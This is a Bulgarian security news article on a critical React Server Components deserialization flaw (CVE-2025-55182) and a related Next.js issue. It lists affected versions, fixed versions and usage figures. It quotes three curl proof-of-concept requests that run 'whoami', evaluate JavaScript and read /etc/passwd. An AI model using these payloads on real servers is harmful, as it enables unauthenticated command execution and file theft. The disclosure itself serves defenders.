Уязвимост в сървърните компоненти на React позволява изпълнение на код от страна на сървъра.

В сървърните компоненти на React web framework (RSC) е отстранена уязвимост (CVE-2025-55182), която може да позволи изпълнение на произволен код на сървъра чрез изпращане на заявка към сървърен манипулатор. Уязвимостта е оценена като критична (10 от 10). Уязвимостта засяга експерименталните компоненти react-server-dom-webpack, react-server-dom-parcel и react-server-dom-turbopack, които се използват за изпълнение на функции и генериране на интерфейсни елементи на сървъра, а не на клиента.

Проблемът е причинен от опасна десериализация на данни, получени в HTTP заявки към сървърни обработчици. Обработчиците "vm#runInThisContext", "vm#runInNewContext", "child_process#execFileSync" и "child_process#execSync" могат да се използват за изпълнение на системни команди или JavaScript код в контекста на текущия процес (заобикаляйки изолацията на sandbox). Възможно е също така да се използват обработчиците "fs#readFileSync" и "fs#writeFileSync" за четене и запис на произволни файлове на сървър, доколкото позволяват настоящите права за достъп. Атаката не изисква удостоверяване. Наличен е прототип на експлойт. # Изпълнете командата whoami curl -X POST http://localhost:3002/formaction \ -F '$ACTION_REF_0=' \ -F '$ACTION_0:0={"id":"child_process#execSync","bound":["whoami"]}' # Изпълнете JavaScript код 1+1 curl -X POST http://localhost:3002/formaction \ -F '$ACTION_REF_0=' \ -F '$ACTION_0:0={"id":"vm#runInThisContext","bound":["1+1"]}' # Прочетете файла /etc/passwd curl -X POST http://localhost:3002/formaction \ -F '$ACTION_REF_0=' \ -F '$ACTION_0:0={"id":"fs#readFileSync","bound":["/etc/passwd","utf8″]}'

Уязвимостта на системата зависи от използването на уязвими сървърни компоненти react-server-dom-webpack, react-server-dom-parcel и react-server-dom-turbopack. Приложенията, които не използват react-server, не са засегнати. Степента, до която уязвимостта засяга производствените системи, използващи React, не е ясна. React е една от най-популярните уеб рамки (използвана от приблизително 6% от уебсайтовете), а уязвимите компоненти се поддържат в основното хранилище и са включени в изданията. Уязвимите компоненти се поддържат и в базирани на React рамки, като Next.js и react-router. Според Wiz Research, уязвими случаи са идентифицирани в 39% от анализираните облачни среди.

От друга страна, генерирането на съдържание сървър чрез React Server Компонентите не са често използвана функция (повечето уебсайтове, работещи с React, рендират потребителския интерфейс само от страна на клиента), а уязвимите компоненти са маркирани като експериментални и не е гарантирано, че ще работят правилно. Тези компоненти имат относително малък брой директни изтегляния от хранилището на NPM: react-server-dom-webpack - 670 000 на седмица, react-server-dom-parcel - 7 000 и react-server-dom-turbopack - 32 000. За сравнение, пакетът React NPM има 45 милиона изтегляния на седмица.

Уязвимостта е налична във версии 9.0.0, 19.1.0, 19.1.1 и 19.2.0 на React и е била поправена в 19.0.1, 19.1.2 и 19.2.1. Уязвимите компоненти се използват и в пакетите Next.js (16 милиона изтегляния седмично), react-router (20 милиона изтегляния седмично), waku, @parcel/rsc, @vitejs/plugin-rsc и rwsdk.

Уязвимост (CVE-2025-66478) в рамката Next.js засяга приложения, използващи App Router и Next.js 15.x и 16.x. Твърди се, че уязвимостта засяга конфигурацията по подразбиране на Next.js (приложението по подразбиране, създадено от помощната програма create-next-app, е уязвимо). На потребителите се препоръчва да инсталират актуализацията Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 или 16.0.7 възможно най-скоро.

Източник: opennet.ru